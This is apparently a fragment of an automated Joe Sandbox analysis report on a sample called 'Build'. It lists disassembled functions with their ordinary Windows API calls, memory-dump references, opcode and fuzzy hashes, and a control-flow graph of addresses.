                                                                                                    • Opcode Fuzzy Hash: d14ae59a6c47695d102f38ce8bebab2561187863f3de3b9f7c7780fcd14afeb7
                                                                                                    • Instruction Fuzzy Hash: 89A1ADB2A063869FDB65CF58C891FBEBBE8EF56340F18416DE495AB242C278CD41C750
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,00929343,?,?,?), ref: 0092C1EE
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,?,00929343,?,?), ref: 0092C22C
                                                                                                    • SetFileTime.KERNEL32(00000800,?,?,00000000,?,?,?,00929343,?,?,?,?,?,?,?,?), ref: 0092C2AF
                                                                                                    • CloseHandle.KERNEL32(00000800,?,?,?,00929343,?,?,?,?,?,?,?,?,?,?), ref: 0092C2B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2287278272-0
                                                                                                    • Opcode ID: 7c3c555660ded6e13cb5818f0f7ca0299851acd2604d8df2dd035d7baa5d31a8
                                                                                                    • Instruction ID: a11db8c49a9ff649e1149592b66a926eeee61195cadf6a1028fd966eea2619dd
                                                                                                    • Opcode Fuzzy Hash: 7c3c555660ded6e13cb5818f0f7ca0299851acd2604d8df2dd035d7baa5d31a8
                                                                                                    • Instruction Fuzzy Hash: 1141D2B024C3919EE320DF64EC46FAFB7E8AF89700F04091DB5D1971C6DA64EA48C752
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 176396367-0
                                                                                                    • Opcode ID: cd8db2cf0f87ce679b39e6d7820eb1a2f9c3ca3b07dbcc6a5681a9722fdd18f5
                                                                                                    • Instruction ID: 63ad9cc9a8badd9b401ab7c3e4ea9451edbff3b897f459bf14d1a7a7f3a82ae8
                                                                                                    • Opcode Fuzzy Hash: cd8db2cf0f87ce679b39e6d7820eb1a2f9c3ca3b07dbcc6a5681a9722fdd18f5
                                                                                                    • Instruction Fuzzy Hash: 6841B4716087519BC725DF38C945A9FBBE8FF85300F10092EF999D3251DB30E9098B96
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 0092BD93
                                                                                                    • _wcslen.LIBCMT ref: 0092BDB6
                                                                                                    • _wcslen.LIBCMT ref: 0092BE4C
                                                                                                    • _wcslen.LIBCMT ref: 0092BEB1
                                                                                                      • Part of subcall function 0092C37A: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,009287BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0092C3A5
                                                                                                      • Part of subcall function 0092BBFF: RemoveDirectoryW.KERNEL32(00000001,?,00000001,00000000), ref: 0092BC1C
                                                                                                      • Part of subcall function 0092BBFF: RemoveDirectoryW.KERNEL32(?,00000001,?,00000800), ref: 0092BC48
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$DirectoryRemove$CloseFind
                                                                                                    • String ID:
                                                                                                    • API String ID: 973666142-0
                                                                                                    • Opcode ID: 6cc0f00f9e9221bf9c6f7b4f12cf7e72f7cbf744fa6d3b56e7d90344279d3032
                                                                                                    • Instruction ID: a590d5018c36620bf0cbdfc40078a81278857c4685fc873353c36f5c6a85dca3
                                                                                                    • Opcode Fuzzy Hash: 6cc0f00f9e9221bf9c6f7b4f12cf7e72f7cbf744fa6d3b56e7d90344279d3032
                                                                                                    • Instruction Fuzzy Hash: 6D41B4725043A096CB30EB64A845AEBB3ED9FC5300F45481EEA8993149EB749D88C7E2
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,62E85006,00946F64,00000000,00000000,00947F99,?,00947F99,?,00000001,00946F64,62E85006,00000001,00947F99,00947F99), ref: 0094F025
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0094F0AE
                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0094F0C0
                                                                                                    • __freea.LIBCMT ref: 0094F0C9
                                                                                                      • Part of subcall function 0094BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A24,?,0000015D,?,?,?,?,00947F00,000000FF,00000000,?,?), ref: 0094BCC0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                    • String ID:
                                                                                                    • API String ID: 2652629310-0
                                                                                                    • Opcode ID: 68fa20883b93ed49445ee12d0c154b7cd9b375bf851bff02b703bbfc29fddddf
                                                                                                    • Instruction ID: 8247f154b2070423764153648e38a2ab478da61581c5f44e5d5e78ee5b1ac257
                                                                                                    • Opcode Fuzzy Hash: 68fa20883b93ed49445ee12d0c154b7cd9b375bf851bff02b703bbfc29fddddf
                                                                                                    • Instruction Fuzzy Hash: 5D31E132A1020AABDF24DF65DC51EAE7BA9EB80310F044229FC04D7192EB35DD94CB90
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 0093C5F6
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0093C605
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0093C613
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0093C621
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDevice$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 1035833867-0
                                                                                                    • Opcode ID: a9462aeb3f9e18d10000a5985b62a4211930c9a571d3c9e7469a2ee41754988c
                                                                                                    • Instruction ID: e1492f3ba2c0fdff853c409a4f2f8f0482b2cb658797342494dabd0c51e30259
                                                                                                    • Opcode Fuzzy Hash: a9462aeb3f9e18d10000a5985b62a4211930c9a571d3c9e7469a2ee41754988c
                                                                                                    • Instruction Fuzzy Hash: 3FE0EC719ADB60A7D3215FA0AC1DFA67B64EB19713F240005F601A63E0CAB094009FD0
                                                                                                    APIs
                                                                                                      • Part of subcall function 0093C629: GetDC.USER32(00000000), ref: 0093C62D
                                                                                                      • Part of subcall function 0093C629: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0093C638
                                                                                                      • Part of subcall function 0093C629: ReleaseDC.USER32(00000000,00000000), ref: 0093C643
                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0093C7E0
                                                                                                      • Part of subcall function 0093CA67: GetDC.USER32(00000000), ref: 0093CA70
                                                                                                      • Part of subcall function 0093CA67: GetObjectW.GDI32(?,00000018,?), ref: 0093CA9F
                                                                                                      • Part of subcall function 0093CA67: ReleaseDC.USER32(00000000,?), ref: 0093CB37
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                    • String ID: (
                                                                                                    • API String ID: 1061551593-3887548279
                                                                                                    • Opcode ID: e3682a134befe72b664a8889182a1465877333abd34bd9d13d4eecc7d1fc9ec6
                                                                                                    • Instruction ID: eceda6dd3c0a72648a067c89fe3d89a7bc47ff24cbb69f143db92d12e56639ec
                                                                                                    • Opcode Fuzzy Hash: e3682a134befe72b664a8889182a1465877333abd34bd9d13d4eecc7d1fc9ec6
                                                                                                    • Instruction Fuzzy Hash: 8091E3B1618754AFD610DF25C844A2BBBE8FFC9B05F10491EF49AE7260CB70A905DF62
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: }
                                                                                                    • API String ID: 176396367-4239843852
                                                                                                    • Opcode ID: 0970b4314c5ddc48bbf76d2d0dedb3ce4066275d06561eb0d7f185a9c1d0a281
                                                                                                    • Instruction ID: 4b54c8d191a9606f872378b03df39bf3d3c09028fefab2fdc7c2eb5b5237afc5
                                                                                                    • Opcode Fuzzy Hash: 0970b4314c5ddc48bbf76d2d0dedb3ce4066275d06561eb0d7f185a9c1d0a281
                                                                                                    • Instruction Fuzzy Hash: 58219D72A0A7455AD731EB64E855F6BB3ECEFC5710F40042AF584C3241EA60E9488BE2
                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 0092D8D3
                                                                                                      • Part of subcall function 00924C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00924C13
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vswprintf_c_l_swprintf
                                                                                                    • String ID: %c:\
                                                                                                    • API String ID: 1543624204-3142399695
                                                                                                    • Opcode ID: e55769dd1f61780e3f78e27caf96f4e79debd2f7cb65e4c0b7b99ca4da3588cc
                                                                                                    • Instruction ID: b7691ec65523023f7a676f87ad333e0518becc669d7ab5c8354c6b36a8ca5cfe
                                                                                                    • Opcode Fuzzy Hash: e55769dd1f61780e3f78e27caf96f4e79debd2f7cb65e4c0b7b99ca4da3588cc
                                                                                                    • Instruction Fuzzy Hash: D70124675073217ADB30AB79BC46E6BA7ACEED6370740441AF484C2186EA20D890C7B1
                                                                                                    APIs
                                                                                                      • Part of subcall function 00930244: _swprintf.LIBCMT ref: 00930284
                                                                                                      • Part of subcall function 00930244: _strlen.LIBCMT ref: 009302A5
                                                                                                      • Part of subcall function 00930244: SetDlgItemTextW.USER32(?,00962274,?), ref: 009302FE
                                                                                                      • Part of subcall function 00930244: GetWindowRect.USER32(?,?), ref: 00930334
                                                                                                      • Part of subcall function 00930244: GetClientRect.USER32(?,?), ref: 00930340
                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 009213AA
                                                                                                    • SetWindowTextW.USER32(00000000,009565F4), ref: 009213C0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 2622349952-4108050209
                                                                                                    • Opcode ID: 0dab8056c3be664f72b7d1e97122456166e72beffe0dc3a524859dfab38a8e76
                                                                                                    • Instruction ID: d8b40cfbcfa80d3ce68cd7fba22bfedf73d99ff2ecb477a6dc71c528e3a06df0
                                                                                                    • Opcode Fuzzy Hash: 0dab8056c3be664f72b7d1e97122456166e72beffe0dc3a524859dfab38a8e76
                                                                                                    • Instruction Fuzzy Hash: 2AF0C23114835CAADF15BF62AC1DBEA3BAEAF60314F048114FC4951DA5DBB5C9A0EF50
                                                                                                    APIs
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,009331E7,?,?,0093325F,?,?,?,?,?,00933249), ref: 009330D0
                                                                                                    • GetLastError.KERNEL32(?,?,0093325F,?,?,?,?,?,00933249), ref: 009330DC
                                                                                                      • Part of subcall function 00927BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00927BD5
                                                                                                    Strings
                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 009330E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                    • Opcode ID: 6c824631001b5e143c63c59c27597bc84c00023b4860febf091ab12724e6f6d7
                                                                                                    • Instruction ID: 19f2d6e75c1d71c84475f73fd71324ce79621e2b8c8823a292e317c53e2778c2
                                                                                                    • Opcode Fuzzy Hash: 6c824631001b5e143c63c59c27597bc84c00023b4860febf091ab12724e6f6d7
                                                                                                    • Instruction Fuzzy Hash: C1D05E3154C63036DA1133B66C0AE6FB9099BA2332FA04714F539661E9DE204E4257D1
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,0092F951,?), ref: 009301FF
                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0092F951,?), ref: 0093020D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FindHandleModuleResource
                                                                                                    • String ID: RTL
                                                                                                    • API String ID: 3537982541-834975271
                                                                                                    • Opcode ID: 99e8f9082dc9548b23511d2d69c4506433120bd8127a4cc78dac1e836f1870b4
                                                                                                    • Instruction ID: fd480b39ec0c4e78a239496c78c5de39ca9e6fbc7348626094e99b53b8a40d4b
                                                                                                    • Opcode Fuzzy Hash: 99e8f9082dc9548b23511d2d69c4506433120bd8127a4cc78dac1e836f1870b4
                                                                                                    • Instruction Fuzzy Hash: F0C0803125575057DB3057737C0DB832E586B40717F450448F541DB1D0D7E6C8458760

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 111 7ff692996470-7ff6929964ab call 7ff692995df8 call 7ff692995e00 call 7ff692995e68 118 7ff6929964b1-7ff6929964bc call 7ff692995e08 111->118 119 7ff6929966d5-7ff692996721 call 7ff69298afc4 call 7ff692995df8 call 7ff692995e00 call 7ff692995e68 111->119 118->119 124 7ff6929964c2-7ff6929964cc 118->124 144 7ff69299685f-7ff6929968cd call 7ff69298afc4 call 7ff692991ce8 119->144 145 7ff692996727-7ff692996732 call 7ff692995e08 119->145 126 7ff6929964ee-7ff6929964f2 124->126 127 7ff6929964ce-7ff6929964d1 124->127 130 7ff6929964f5-7ff6929964fd 126->130 129 7ff6929964d4-7ff6929964df 127->129 132 7ff6929964e1-7ff6929964e8 129->132 133 7ff6929964ea-7ff6929964ec 129->133 130->130 134 7ff6929964ff-7ff692996512 call 7ff69298dcbc 130->134 132->129 132->133 133->126 136 7ff69299651b-7ff692996529 133->136 141 7ff692996514-7ff692996516 call 7ff69298b00c 134->141 142 7ff69299652a-7ff692996536 call 7ff69298b00c 134->142 141->136 152 7ff69299653d-7ff692996545 142->152 165 7ff6929968cf-7ff6929968d6 144->165 166 7ff6929968db-7ff6929968de 144->166 145->144 154 7ff692996738-7ff692996743 call 7ff692995e38 145->154 152->152 155 7ff692996547-7ff692996558 call 7ff692990f54 152->155 154->144 163 7ff692996749-7ff69299676c call 7ff69298b00c GetTimeZoneInformation 154->163 155->119 164 7ff69299655e-7ff6929965b4 call 7ff69297d1e0 * 4 call 7ff69299638c 155->164 179 7ff692996772-7ff692996793 163->179 180 7ff692996834-7ff69299685e call 7ff692995df0 call 7ff692995de0 call 7ff692995de8 163->180 223 7ff6929965b6-7ff6929965ba 164->223 171 7ff69299696b-7ff69299696e 165->171 169 7ff6929968e0 166->169 170 7ff692996915-7ff692996928 call 7ff69298dcbc 166->170 172 7ff6929968e3 169->172 185 7ff692996933-7ff69299694e call 7ff692991ce8 170->185 186 7ff69299692a 170->186 171->172 173 7ff692996974-7ff69299697c call 7ff692996470 171->173 182 7ff6929968e8-7ff692996914 call 7ff69298b00c call 7ff69297bdc0 172->182 183 7ff6929968e3 call 7ff6929966ec 172->183 173->182 187 7ff69299679e-7ff6929967a5 179->187 188 7ff692996795-7ff69299679b 179->188 183->182 209 7ff692996950-7ff692996953 185->209 210 7ff692996955-7ff692996967 call 7ff69298b00c 185->210 192 7ff69299692c-7ff692996931 call 7ff69298b00c 186->192 194 7ff6929967a7-7ff6929967af 187->194 195 7ff6929967b9 187->195 188->187 192->169 194->195 202 7ff6929967b1-7ff6929967b7 194->202 205 7ff6929967bb-7ff69299682f call 7ff69297d1e0 * 4 call 7ff6929932cc call 7ff692996984 * 2 195->205 202->205 205->180 209->192 210->171 225 7ff6929965c0-7ff6929965c4 223->225 226 7ff6929965bc 223->226 225->223 228 7ff6929965c6-7ff6929965eb call 7ff69298716c 225->228 226->225 234 7ff6929965ee-7ff6929965f2 228->234 236 7ff692996601-7ff692996605 234->236 237 7ff6929965f4-7ff6929965ff 234->237 236->234 237->236 239 7ff692996607-7ff69299660b 237->239 242 7ff69299668c-7ff692996690 239->242 243 7ff69299660d-7ff692996635 call 7ff69298716c 239->243 244 7ff692996692-7ff692996694 242->244 245 7ff692996697-7ff6929966a4 242->245 250 7ff692996653-7ff692996657 243->250 251 7ff692996637 243->251 244->245 247 7ff6929966bf-7ff6929966ce call 7ff692995df0 call 7ff692995de0 245->247 248 7ff6929966a6-7ff6929966bc call 7ff69299638c 245->248 247->119 248->247 250->242 256 7ff692996659-7ff692996677 call 7ff69298716c 250->256 254 7ff69299663a-7ff692996641 251->254 254->250 258 7ff692996643-7ff692996651 254->258 263 7ff692996683-7ff69299668a 256->263 258->250 258->254 263->242 264 7ff692996679-7ff69299667d 263->264 264->242 265 7ff69299667f 264->265 265->263
                                                                                                    APIs
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF6929964B5
                                                                                                      • Part of subcall function 00007FF692995E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF692995E1C
                                                                                                      • Part of subcall function 00007FF69298B00C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF692993492,?,?,?,00007FF6929934CF,?,?,00000000,00007FF692993995,?,?,00000000,00007FF6929938C7), ref: 00007FF69298B022
                                                                                                      • Part of subcall function 00007FF69298B00C: GetLastError.KERNEL32(?,?,?,00007FF692993492,?,?,?,00007FF6929934CF,?,?,00000000,00007FF692993995,?,?,00000000,00007FF6929938C7), ref: 00007FF69298B02C
                                                                                                      • Part of subcall function 00007FF69298AFC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF69298AFA3,?,?,?,?,?,00007FF6929831CC), ref: 00007FF69298AFCD
                                                                                                      • Part of subcall function 00007FF69298AFC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF69298AFA3,?,?,?,?,?,00007FF6929831CC), ref: 00007FF69298AFF2
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF6929964A4
                                                                                                      • Part of subcall function 00007FF692995E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF692995E7C
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69299671A
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69299672B
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF69299673C
